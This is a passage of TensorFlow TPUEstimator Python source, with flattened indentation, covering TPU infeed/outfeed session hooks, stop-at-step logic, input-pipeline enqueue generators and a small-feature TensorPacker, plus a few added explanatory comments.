hooks = [_OutfeedHostCallHook(host_call_ret['host_call'])]
loss = self.loss
if tensor_tracer.TensorTracer.is_enabled() \
and self.train_op is not None:
tt = tensor_tracer.TensorTracer()
loss = tt.trace_cpu(ops.get_default_graph(), loss, self.train_op)
hooks = tuple(hooks or [])
scaffold = self.scaffold_fn() if self.scaffold_fn else None
return model_fn_lib.EstimatorSpec(
mode=self.mode,
predictions=self.predictions,
loss=loss,
train_op=self.train_op,
eval_metric_ops=eval_metric_ops,
export_outputs=self.export_outputs,
scaffold=scaffold,
training_hooks=self.training_hooks + hooks,
evaluation_hooks=self.evaluation_hooks + hooks,
prediction_hooks=self.prediction_hooks + hooks)
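# Illustrative sketch (not part of the original module): how a model_fn would
# typically package `eval_metrics` for this spec. The tensor names and the
# accuracy metric below are hypothetical; only the (metric_fn, tensors) tuple
# shape is what TPUEstimatorSpec expects. Under TF 1.x this could look like:
#
#   def metric_fn(labels, logits):
#     predictions = tf.argmax(logits, axis=-1)
#     return {'accuracy': tf.metrics.accuracy(labels, predictions)}
#
#   return TPUEstimatorSpec(
#       mode=mode,
#       loss=loss,
#       train_op=train_op,
#       eval_metrics=(metric_fn, [labels, logits]))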
class _OpQueueContext(object):
"""Manages work queue and thread for a infeed/outfeed thread."""
def __init__(self, name, target, args):
self._name = name
self._queue = Queue.Queue()
args = (self,) + args
self._thread = threading.Thread(name=name, target=target, args=args)
self._thread.daemon = True
self._thread.start()
def stop(self):
self._queue.put(_SIGNAL.STOP)
def send_next_batch_signal(self, iterations):
self._queue.put(iterations)
def read_iteration_counts(self):
while True:
iterations = self._queue.get(block=True)
logging.debug('%s read iterations %s', self._name, iterations)
if iterations == _SIGNAL.STOP:
logging.info('%s received shutdown signal, stopping.', self._name)
return
yield iterations
def join(self):
logging.info('Shutting down %s thread.', self._name)
self.stop()
self._thread.join()
class _OpSignalOnceQueueContext(_OpQueueContext):
"""Manages work queue and thread for a infeed/outfeed thread.
This subclass only signals once.
"""
def __init__(self, name, target, args):
super(_OpSignalOnceQueueContext, self).__init__(name, target, args)
self._has_signaled = False
def send_next_batch_signal(self, iterations):
if not self._has_signaled:
self._queue.put(iterations)
self._has_signaled = True
class TPUInfeedOutfeedSessionHook(session_run_hook.SessionRunHook):
"""A Session hook setting up the TPU initialization, infeed, and outfeed.
This hook does two major things:
1. initialize and shut down the TPU system.
2. launch and join the threads for infeed enqueue and (optional) outfeed
dequeue.
"""
def __init__(self,
ctx,
enqueue_ops,
dequeue_ops,
tpu_compile_op,
run_infeed_loop_on_coordinator=True,
rendezvous=None,
master=None,
session_config=None,
tpu_init_ops=None,
outfeed_every_n_steps=1):
self._master_job = ctx.master_job
self._enqueue_ops = enqueue_ops
self._dequeue_ops = dequeue_ops
self._rendezvous = rendezvous
self._master = master
self._session_config = session_config
self._init_ops = list(tpu_init_ops or [])
if ctx.embedding_config is None:
self._embedding_layer_config = None
else:
self._embedding_layer_config = (
ctx.embedding_config.tpu_embedding.config_proto)
self._run_infeed_loop_on_coordinator = run_infeed_loop_on_coordinator
self._initial_infeed_sleep_secs = (
ctx.config.tpu_config.initial_infeed_sleep_secs)
self._tpu_compile_op = tpu_compile_op
# When using model parallelism, the TPU is pre-initialized at startup to
# fetch mesh information. We skip re-initializing it here for
# MeshTensorFlow since it places variables on the TPU directly. Re-initializing
# the TPU would corrupt those variables, since the previously allocated memory
# might be overwritten for other purposes.
if (ctx.model_parallelism_enabled and
(ctx.config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.BROADCAST)):
self._should_initialize_tpu = False
else:
self._should_initialize_tpu = True
self._outfeed_every_n_steps = outfeed_every_n_steps
def begin(self):
logging.info('TPU job name %s', self._master_job)
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
if self._should_initialize_tpu:
self._finalize_ops = [tpu.shutdown_system(job=self._master_job)]
else:
self._finalize_ops = []
summary_writer_init_ops = contrib_summary.summary_writer_initializer_op()
self._init_ops.extend(summary_writer_init_ops)
# Get all the writer resources from the initializer, so we know what to
# flush.
for op in summary_writer_init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def _run_infeed(self, queue_ctx, session):
logging.info('Starting infeed thread controller.')
if self._initial_infeed_sleep_secs:
logging.info('Infeed thread sleeping for %d seconds.',
self._initial_infeed_sleep_secs)
time.sleep(self._initial_infeed_sleep_secs)
logging.info('Infeed thread starting after sleep')
with self._rendezvous.catch_errors(source='infeed', session=session):
if self._run_infeed_loop_on_coordinator:
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
for i in xrange(steps):
logging.debug('Infeed enqueue for iteration (%d, %d)', count, i)
session.run(self._enqueue_ops)
else:
for _ in queue_ctx.read_iteration_counts():
session.run(self._enqueue_ops)
logging.info('Infeed thread finished, shutting down.')
def _run_outfeed(self, queue_ctx, session):
logging.info('Starting outfeed thread controller.')
status_logger = PeriodicLogger(seconds=60)
with self._rendezvous.catch_errors(source='outfeed', session=session):
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
step_counter = 0
for i in xrange(steps):
logging.debug('Outfeed dequeue for iteration (%d, %d)', count, i)
if step_counter % self._outfeed_every_n_steps == 0:
session.run(self._dequeue_ops)
step_counter += 1
status_logger.log('Outfeed finished for iteration (%d, %d)', count, i)
logging.info('Outfeed thread finished, shutting down.')
def _create_infeed_controller(self, name, target, args):
return _OpQueueContext(name=name, target=target, args=args)
def _assertCompilationSucceeded(self, result, coord):
proto = tpu_compilation_result.CompilationResultProto()
proto.ParseFromString(result)
if proto.status_error_message:
logging.error('Compilation failed: {}'.format(proto.status_error_message))
coord.request_stop()
else:
logging.info('Compilation succeeded')
def after_create_session(self, session, coord):
if self._should_initialize_tpu:
logging.info('Init TPU system')
start = time.time()
with ops.Graph().as_default():
with tf_session.Session(
self._master, config=self._session_config) as sess:
sess.run(
tpu.initialize_system(
job=self._master_job,
embedding_config=self._embedding_layer_config))
logging.info('Initialized TPU in %d seconds', time.time() - start)
session.run(self._init_ops,
options=config_pb2.RunOptions(timeout_in_ms=5 * 60 * 1000))
if os.environ.get('TPU_SPLIT_COMPILE_AND_EXECUTE', '') == '1':
logging.info('Compiling user program: this may take a while...')
self._assertCompilationSucceeded(session.run(self._tpu_compile_op), coord)
self._infeed_controller = self._create_infeed_controller(
name='InfeedController', target=self._run_infeed, args=(session,))
self._outfeed_controller = _OpQueueContext(
name='OutfeedController', target=self._run_outfeed, args=(session,))
# Enable the worker watchdog to terminate workers on coordinator exit.
watchdog_timeout = int(os.environ.get('TF_TPU_WATCHDOG_TIMEOUT', '0'))
if watchdog_timeout > 0:
session_support.start_worker_watchdog(session,
shutdown_timeout=watchdog_timeout)
def before_run(self, run_context):
iterations = run_context.session.run(self._iterations_per_loop_var)
logging.info('Enqueue next (%d) batch(es) of data to infeed.', iterations)
self._infeed_controller.send_next_batch_signal(iterations)
logging.info('Dequeue next (%d) batch(es) of data from outfeed.',
iterations)
self._outfeed_controller.send_next_batch_signal(iterations)
def end(self, session):
logging.info('Stop infeed thread controller')
self._infeed_controller.join()
self._rendezvous.record_done('infeed')
logging.info('Stop outfeed thread controller')
self._outfeed_controller.join()
self._rendezvous.record_done('outfeed')
logging.info('Shutdown TPU system.')
session.run(self._finalize_ops)
class TPUInfeedOutfeedSessionHookForPrediction(TPUInfeedOutfeedSessionHook):
def __init__(self, ctx, enqueue_ops, dequeue_ops, tpu_compile_op,
rendezvous=None, master=None, session_config=None):
super(TPUInfeedOutfeedSessionHookForPrediction, self).__init__(
ctx,
enqueue_ops,
dequeue_ops,
tpu_compile_op=tpu_compile_op,
run_infeed_loop_on_coordinator=False,
rendezvous=rendezvous,
master=master,
session_config=session_config)
def _create_infeed_controller(self, name, target, args):
return _OpSignalOnceQueueContext(name=name, target=target, args=args)
class _TPUStopAtStepHook(session_run_hook.SessionRunHook):
"""Hook that requests stop at a specified step.
This hook is similar to the `session_run_hook._StopAfterNEvalsHook` with
the following differences for TPU training:
1. This hook sets the variable for `iterations_per_loop`, which is used by
`TPUInfeedOutfeedSessionHook` to control the iterations for infeed/outfeed.
If the `iterations_per_loop` value is specified as time in seconds, the
number of iterations per `Session.run` will be estimated automatically
based on per iteration runtime.
As the hook execution order is not guaranteed, the variable update is
handled in `after_create_session` and `after_run` as
`TPUInfeedOutfeedSessionHook` reads the variable value in `before_run`.
2. For each training loop (session.run), the global step could be increased
multiple times on TPU. The global step tensor value will be explicitly read
again in `after_run` to ensure the latest value is retrieved, avoiding a race
condition.
"""
def __init__(self,
iterations_per_loop_counter,
num_steps=None,
final_step=None):
"""Initializes a `TPUStopAtStepHook`.
Args:
iterations_per_loop_counter: A namedtuple of [`value`, `unit`] that
represents either an iteration count or a time in seconds to run the
optimizer per loop, depending on whether `unit` is `count` or `seconds`
respectively.
num_steps: Number of steps to execute.
final_step: Step after which to stop.
Raises:
ValueError: If one of the arguments is invalid.
"""
if num_steps is None and final_step is None:
raise ValueError('One of `num_steps` or `final_step` must be specified.')
if num_steps is not None and final_step is not None:
raise ValueError(
'Only one of `num_steps` or `final_step` can be specified.')
self._iterations_per_loop_counter = iterations_per_loop_counter
if self._iterations_per_loop_counter.unit not in ['seconds', 'count']:
raise ValueError(
'Only `count` or `seconds` are accepted as the '
'`iterations_per_loop_counter.unit')
self._num_steps = num_steps
self._final_step = final_step
self._next_iteration_count = 1
self._iteration_count_estimator = None
if self._iterations_per_loop_counter.unit == 'seconds':
self._iteration_count_estimator = (
iteration_count_estimator.IterationCountEstimator())
self._start_time = time.time()
def _next_iterations(self, global_step, final_step):
"""Computes the next iterations count.
The next iterations count is computed by choosing the smaller of the
remaining step count (`final_step` - `global_step`) and the estimated
iterations count returned by the estimator.
Args:
global_step: The current step.
final_step: Step after which to stop.
Returns:
The number of iterations count to run per loop.
"""
remaining_steps = final_step - global_step
if self._iteration_count_estimator is not None:
estimated_iterations = self._iteration_count_estimator.get(
self._iterations_per_loop_counter.value)
else:
estimated_iterations = self._iterations_per_loop_counter.value
self._next_iteration_count = min(remaining_steps, estimated_iterations)
return self._next_iteration_count
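  # Worked example (illustration only): with final_step=10, global_step=8 and
  # an estimated iterations count of 4, remaining_steps is 2, so the next loop
  # runs min(2, 4) = 2 iterations.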
def begin(self):
"""Initializes variables.
Initializes the global step and iterations per loop variables.
Raises:
RuntimeError: An error occurred if global step variable does not exist.
"""
self._global_step_tensor = training_util.get_global_step()
if self._global_step_tensor is None:
raise RuntimeError('Global step should be created.')
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
"""Computes and updates the first time iterations count.
The iterations count is computed by choosing the smaller of (`final_step` -
`global_step`) and the initial estimated iterations returned by the
estimator (1 by default).
Args:
session: A TensorFlow Session that has been created.
coord: A Coordinator object which keeps track of all threads.
"""
global_step = session.run(self._global_step_tensor)
if self._final_step is None:
self._final_step = global_step + self._num_steps
iterations = self._next_iterations(global_step, self._final_step)
self._iterations_per_loop_var.load(iterations, session=session)
def before_run(self, run_context):
"""Reset the timer."""
if self._iteration_count_estimator is not None:
self._start_time = time.time()
def after_run(self, run_context, run_values):
"""Computes the next iterations per loop value or terminates.
Computes the elapsed time to run the last optimizer loop and if the
`IterationCountEstimator` is used, records the elapsed time and iterations
count. If the final step count has been reached, terminates. Otherwise,
computes and updates the number of iterations to run the optimizer per loop.
Args:
run_context: A `SessionRunContext` object.
run_values: A SessionRunValues object.
"""
if self._iteration_count_estimator is not None:
elapsed_time = time.time() - self._start_time
logging.info("ElapsedTime: %.3f", elapsed_time)
self._iteration_count_estimator.update(elapsed_time,
self._next_iteration_count)
# Global step cannot be retrieved via SessionRunArgs and before_run due to
# race condition.
global_step = run_context.session.run(self._global_step_tensor)
if global_step >= self._final_step:
run_context.request_stop()
else:
iterations = self._next_iterations(global_step, self._final_step)
self._iterations_per_loop_var.load(
iterations, session=run_context.session)
class _SetEvalIterationsHook(session_run_hook.SessionRunHook):
"""Hook that requests stop at a specified step."""
def __init__(self, num_steps):
"""Initializes a `_SetEvalIterationsHook`.
Args:
num_steps: Number of steps to execute.
"""
self._num_steps = num_steps
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
self._iterations_per_loop_var.load(self._num_steps, session=session)
class _StoppingPredictHook(session_run_hook.SessionRunHook):
"""Hook that requests stop according to the stopping signal in prediction."""
def __init__(self, scalar_stopping_signal):
self._scalar_stopping_signal = scalar_stopping_signal
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
# This is not necessary as we do not run infeed enqueue and outfeed dequeue
# in side threads for the prediction model. But it makes
# TPUInfeedOutfeedSessionHook print a nicer message.
self._iterations_per_loop_var.load(1, session=session)
def before_run(self, run_context):
return session_run_hook.SessionRunArgs(self._scalar_stopping_signal)
def after_run(self, run_context, run_values):
_ = run_context
scalar_stopping_signal = run_values.results
if _StopSignals.should_stop(scalar_stopping_signal):
# NOTE(xiejw): In prediction, stopping signals are inserted for each
# batch. And we append one more batch to signal the system it should stop.
# The data flow might look like
#
# batch 0: images, labels, stop = 0 (user provided)
# batch 1: images, labels, stop = 0 (user provided)
# ...
# batch 99: images, labels, stop = 0 (user provided)
# batch 100: images, labels, stop = 1 (TPUEstimator appended)
#
# where the final batch (id = 100) is appended by TPUEstimator, so we
# should drop it before returning the predictions to user.
# To achieve that, we throw the OutOfRangeError in after_run. Once
# Monitored Session sees this error in SessionRunHook.after_run, the
# "current" prediction, i.e., batch with id=100, will be discarded
# immediately
raise errors.OutOfRangeError(None, None, 'Stopped by stopping signal.')
def generate_per_core_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, host_device, host_id):
"""Generates infeed enqueue ops for per-core input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""A fn returns enqueue_ops."""
num_cores_per_host = ctx.num_of_cores_per_host
per_host_sharded_inputs = []
for core_ordinal in range(num_cores_per_host):
with ops.name_scope('ordinal_%d' % (core_ordinal)):
user_context = tpu_context.TPUContext(
internal_ctx=ctx,
input_device=host_device,
invocation_index=host_id * ctx.num_of_cores_per_host + core_ordinal)
inputs = _Inputs.from_input_fn(input_fn(user_context))
if inputs.is_dataset:
raise TypeError(
'`input_fn` returning `Dataset` is not yet supported in '
'per-Core input pipeline deployment. Please set '
'TPUConfig.per_host_input_for_training to True or return '
'`features` and `labels` from `input_fn`')
features, labels = inputs.features_and_labels()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels))
per_host_sharded_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs, tpu_ordinal_function=tpu_ordinal_function_impl)
return per_host_enqueue_ops
return enqueue_ops_fn, captured_infeed_queue
def generate_per_host_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, batch_axis, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
with ops.device(device):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device, invocation_index=host_id)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
'For mode PREDICT, `input_fn` must return `Dataset` instead of '
'`features` and `labels`.')
if batch_axis is not None:
raise TypeError('For mode PREDICT, batch_axis is not supported yet.')
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True)
if is_dataset:
dataset_initializer = inputs.dataset_initializer()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""A Fn returning the TPU infeed enqueue ops.
By providing it as a Fn, it can be invoked inside the tf.while_loop such that
the input pipeline for multiple iterations can be executed by one
Session.run call.
Returns:
list of dict of ops.
"""
with ops.device(device):
num_of_replicas_per_host = ctx.num_of_replicas_per_host
# Convert user input to features and labels. If the user returns a
# dataset, it is initialized and the features and labels extracted via
# `dataset.iterator.get_next()`
features, labels = inputs.features_and_labels()
signals = inputs.signals()
inputs_structure_recorder.validate_and_record_structure(features, labels)
unsharded_tensor_list = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
infeed_queue = tpu_feed.InfeedQueue(
tuple_types=[t.dtype for t in unsharded_tensor_list],
tuple_shapes=[t.shape for t in unsharded_tensor_list],
shard_dimensions=batch_axis)
captured_infeed_queue.capture(infeed_queue)
infeed_queue.set_number_of_shards(num_of_replicas_per_host)
per_host_enqueue_ops = (
infeed_queue.split_inputs_and_generate_enqueue_ops(
unsharded_tensor_list,
placement_function=lambda x: device,
tpu_ordinal_function=tpu_ordinal_function_impl))
if signals is None:
return per_host_enqueue_ops
else:
return {
'ops': per_host_enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
def generate_per_host_v2_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
with ops.device(device):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device, invocation_index=host_id)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if not is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for the PER_HOST_V2 '
'input pipeline configuration.')
# Be aware that when num_cores_per_replica > num_cores_per_host,
# ctx.num_of_replicas_per_host is 0.
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True,
num_invocations_per_step=max(1, ctx.num_of_replicas_per_host))
dataset_initializer = inputs.dataset_initializer()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def device_function_impl(shard_id):
if ctx.device_assignment is not None:
# Find the replica_id of the host's logical core 0.
# The current host_id is guaranteed to contain the logical core 0,
# even when num_cores_per_replica > num_cores_per_host -- the function
# caller makes sure that this host_id will be receiving data (i.e., it calls
# input_fn).
replica_id = ctx.device_assignment.lookup_replicas(
task_id=host_id, logical_core=0)[shard_id]
return ctx.tpu_host_placement_function(replica_id=replica_id)
else:
return None
def enqueue_ops_fn():
"""Generates the per_host enqueue ops."""
control_deps = []
per_host_sharded_inputs = []
enqueue_datas_list = []
# Be aware that when num_cores_per_replica > num_cores_per_host,
# ctx.num_of_replicas_per_host is 0.
num_replicas_per_host = max(1, ctx.num_of_replicas_per_host)
cached_signals = None
with ops.device(device):
if not inputs.is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for this mode.')
for _ in range(num_replicas_per_host):
# Use control dependencies to ensure a deterministic ordering.
with ops.control_dependencies(control_deps):
features, labels = inputs.features_and_labels() # Calls get_next()
signals = inputs.signals()
# All the replicas share the replica 0's stopping signal.
# This avoids inconsistent state among different model replicas.
if cached_signals:
signals['stopping'] = cached_signals['stopping']
else:
cached_signals = signals
features, labels, enqueue_data = (
_tpu_estimator_embedding.split_inputs(ctx, features, labels))
enqueue_datas_list.append(enqueue_data)
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
control_deps.extend(flattened_inputs)
per_host_sharded_inputs.append(flattened_inputs)
if inputs_structure_recorder.flattened_input_dims:
input_partition_dims = inputs_structure_recorder.flattened_input_dims
if signals:
input_partition_dims += [None] * len(signals)
# pylint: disable=protected-access
infeed_queue = tpu_feed._PartitionedInfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]),
host_id=host_id,
input_partition_dims=input_partition_dims,
device_assignment=ctx.device_assignment)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs)
else:
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs,
tpu_ordinal_function=tpu_ordinal_function_impl,
placement_function=device_function_impl)
captured_infeed_queue.capture(infeed_queue)
if ctx.embedding_config:
per_host_enqueue_ops.extend(
ctx.embedding_config.tpu_embedding.generate_enqueue_ops(
enqueue_datas_list))
if signals is None:
return per_host_enqueue_ops
else:
return {
'ops': per_host_enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
def generate_broadcast_enqueue_ops_fn(ctx, input_fn, inputs_structure_recorder,
num_hosts):
"""Generates infeed enqueue ops for one input_fn on all the hosts."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
device_0 = ctx.tpu_host_placement_function(host_id=0)
with ops.device(device_0):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device_0, invocation_index=0)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
'For mode PREDICT, `input_fn` must return `Dataset` instead of '
'`features` and `labels`.')
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True)
if is_dataset:
dataset_initializer = inputs.dataset_initializer()
num_replicas_per_host = ctx.num_of_replicas_per_host
def tpu_ordinal_function_impl(shard_id):
if ctx.device_assignment:
return ctx.device_assignment.tpu_ordinal(replica=shard_id)
else:
return shard_id % num_replicas_per_host
def device_function_impl(shard_id):
# shard_id ranges from 0 to num_of_replicas_per_host - 1.
# A shard is a replica inside a host.
# In broadcast mode (generate_broadcast_enqueue_ops_fn), the enqueue ops
# are always executed on the first host. Thus shard_id equals replica_id.
return ctx.tpu_host_placement_function(replica_id=shard_id)
def enqueue_ops_fn():
"""Generates enqueue ops for all the hosts."""
broadcasted_inputs = []
flattened_inputs = None # Cache result from input_fn.
signals = None
num_replicas = ctx.num_replicas
core_id = 0
for host_id in xrange(num_hosts):
with ops.device(ctx.tpu_host_placement_function(host_id=host_id)):
for _ in xrange(ctx.num_of_replicas_per_host):
# Note: input_fn is only called once at host 0 for the first replica.
# The features and labels returned from that invocation are
# broadcast to other replicas (including the replicas on other
# hosts).
if flattened_inputs is None:
features, labels = inputs.features_and_labels() # Calls get_next()
signals = inputs.signals()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
if (ctx.config.tpu_config.eval_training_input_configuration is
tpu_config.InputPipelineConfig.SLICED):
input_slices = [
array_ops.split(x, num_replicas) for x in flattened_inputs
]
if (ctx.config.tpu_config.eval_training_input_configuration is
tpu_config.InputPipelineConfig.SLICED):
# for each core, slice out the flattened_inputs for each core.
broadcasted_inputs.append([x[core_id] for x in input_slices])
core_id += 1
else:
broadcasted_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(broadcasted_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
enqueue_ops = infeed_queue.generate_enqueue_ops(
broadcasted_inputs,
tpu_ordinal_function=tpu_ordinal_function_impl,
placement_function=device_function_impl)
if signals is None:
return enqueue_ops
else:
return {
'ops': enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
class TensorPacker(object):
"""Pack and unpack small tensors into a big one for efficiency."""
def __init__(self, small_feature_dim_size,
minimum_num_small_features_to_group):
self._small_feature_dim_size = small_feature_dim_size
self._minimum_num_small_features_to_group = (
minimum_num_small_features_to_group)
def maybe_concatenate_features(self, features):
"""If there are enough small tensors, concat them for performance."""
self._small_feature_names = {}
self._small_feature_sizes = {}
feature_names = _extract_key_names(features)
if feature_names: # Not a single tensor.
# First pass: see if it is worth concatenating the small features.
for name in feature_names:
tensor = features[name]
# We do not handle nested inputs here.
if not isinstance(tensor, ops.Tensor):
return
shape = tensor.get_shape().as_list()
dtype = tensor.dtype
if (len(shape) == 2 and
shape[1] <= self._small_feature_dim_size):
logging.info('Found small feature: %s %s', name, shape)
if tensor.dtype not in self._small_feature_names:
self._small_feature_names[dtype] = []
self._small_feature_sizes[dtype] = []
self._small_feature_names[dtype].append(name)
self._small_feature_sizes[dtype].append(shape[1])
dtypes_ = list(self._small_feature_names.keys())
for dtype in dtypes_:
# If we could find 5 (or more) [batch_size, 1] dense features,
# we will group them.
if (len(self._small_feature_names[dtype]) <
self._minimum_num_small_features_to_group):
self._small_feature_names.pop(dtype) # reset
self._small_feature_sizes.pop(dtype) # reset
# Second pass: separate small features out
small_feature_tensors = {}
for dtype in self._small_feature_names:
small_feature_tensors[dtype] = []
for name in self._small_feature_names[dtype]:
small_feature_tensors[dtype].append(features.pop(name))
# Add the concat Tensor to features with a special key.
for dtype in self._small_feature_names:
key = self._get_small_feature_key(dtype)
if key in features:
raise ValueError('{} is reserved as feature key for concatenated'
' small features.'.format(key))
features[key] = (array_ops.concat(small_feature_tensors[dtype], axis=1))
def maybe_split_features(self, maybe_concatenated_features):
for dtype in self._small_feature_names:
key = self._get_small_feature_key(dtype)
concatenated_small_features = maybe_concatenated_features.pop(key)
splits = array_ops.split(
concatenated_small_features, self._small_feature_sizes[dtype], axis=1)
for name, split in zip(self._small_feature_names[dtype], splits):
maybe_concatenated_features[name] = split
def _get_small_feature_key(self, dtype):
return _TENSOR_PACKER_CONCATENATED_SMALL_FEATURES_KEY + '_' + str(dtype)
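# Illustrative sketch (not part of the original module): what TensorPacker does
# to a features dict at the default thresholds. The feature names are made up.
# Given five float32 features of shape [batch, 1] (say 'age', 'clicks', ...),
# maybe_concatenate_features pops them and replaces them with one [batch, 5]
# tensor stored under the reserved '_concatenated_small_features_<dtype>' key;
# maybe_split_features later restores the original per-name [batch, 1] tensors
# on the device side.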
class _InputPipeline(object):
"""`_InputPipeline` handles invoking `input_fn` and piping to infeed queue.
`_InputPipeline` abstracts the per-core/per-host `input_fn` invocation from
call site. To be precise, based on the configuration in
`_InternalTPUContext`, it invokes `input_fn` for all cores (usually
multi-host TPU training) or for one host (usually for single-host TPU
evaluation), and sends all `features` and `labels` returned by `input_fn` to
TPU infeed. For per-core invocation, `features` and `labels` are piped to
infeed directly, one tuple for each core. For per-host invocation, `features`
and `labels` are split at host (with respect to `batch_axis`) and piped to all
cores accordingly.
In addition, flatten/unflatten are handled by `_InputPipeline` also. Model
inputs returned by the `input_fn` can have one of the following forms:
1. features
2. (features, labels)
3. ((arbitrarily nested structure of features), labels)
Internally, form 1 is reformed to `(features, None)` as features and labels
are passed separately to underlying methods. For TPU training, TPUEstimator
may expect multiple `features` and `labels` tuples one for each core.
TPUEstimator allows various different structures for inputs (namely `features`
and `labels`). Both `features` and `labels` can be any nested structure
supported by TF nest (namely, dicts, tuples, namedtuples or any nested
structure of such containing Tensors). `labels` may also be `None`.
These are flattened before they are passed to the infeed/outfeed library,
as that expects flattened lists.
"""
class InputsStructureRecorder(object):
"""The recorder to record inputs structure."""
def __init__(self, input_partition_dims=None):
# Holds the structure of inputs
self._feature_structure = {}
self._flattened_input_dims = None
if input_partition_dims:
# This should have been validated in TPUConfig.
assert len(input_partition_dims) <= 2, 'must have 1 or 2 elements.'
if len(input_partition_dims) == 2:
self._feature_dims, self._label_dims = input_partition_dims
else:
self._feature_dims = input_partition_dims[0]
self._label_dims = None
assert self._feature_dims is not None, ('input_partition_dims[0] must '
'not be None')
else:
self._feature_dims = None
self._label_dims = None
# Internal state.
self._initialized = False
@property
def flattened_input_dims(self):
assert self._initialized, 'InputsStructureRecorder is not initialized.'
return self._flattened_input_dims
def has_labels(self):
return 'labels' in self._feature_structure
def _flatten_input_dims(self, features, labels, feature_dims, label_dims):
"""Flatten input dims with the same order as flattened input tensors."""
try:
flattened_input_dims = data_nest.flatten_up_to(features, feature_dims)
except TypeError as e:
raise ValueError(
'TPUConfig.input_partition_dims[0] mismatched the structure of'
' features. input_partition_dims[0]: {}, features {}. {}'.format(
feature_dims, features, e))
if labels is not None:
if label_dims is not None:
try:
flattened_input_dims.extend(
data_nest.flatten_up_to(labels, self._label_dims))
except TypeError as e:
raise ValueError(
'TPUConfig.input_partition_dims[1] mismatched the structure of'
' labels. input_partition_dims[1]: {}, labels: {}. {}'.format(
label_dims, labels, e))
else:
num_label_tensors = len(data_nest.flatten(labels))
flattened_input_dims.extend([None] * num_label_tensors)
return flattened_input_dims
def validate_and_record_structure(self, features, labels):
"""Validates and records the structure of `features` and `labels`."""
# Extract structure.
feature_names = _extract_key_names(features)
label_names = _extract_key_names(labels)
if not self._initialized:
# Record structure.
self._initialized = True
if self._feature_dims is not None:
feature_dims_names = _extract_key_names(self._feature_dims)
if feature_dims_names != feature_names:
raise ValueError(
'TPUConfig.input_partition_dims[0] mismatched feature'
' keys. Expected {}, got {}'.format(feature_names,
feature_dims_names))
label_dims_names = _extract_key_names(self._label_dims)
if self._label_dims is not None and label_dims_names != label_names:
raise ValueError(
'TPUConfig.input_partition_dims[1] mismatched label'
' keys. Expected {}, got {}'.format(label_names,
label_dims_names))
self._flattened_input_dims = self._flatten_input_dims(
features, labels, self._feature_dims, self._label_dims)
def flatten_features_and_labels(self, features, labels, signals=None):
"""Flattens the `features` and `labels` to a single tensor list."""
self.tensor_packer = TensorPacker(
_TENSOR_PACKER_SMALL_FEATURE_DIM_SIZE,
_TENSOR_PACKER_MINIMUM_NUM_SMALL_FEATURES_TO_GROUP)
self.tensor_packer.maybe_concatenate_features(features)
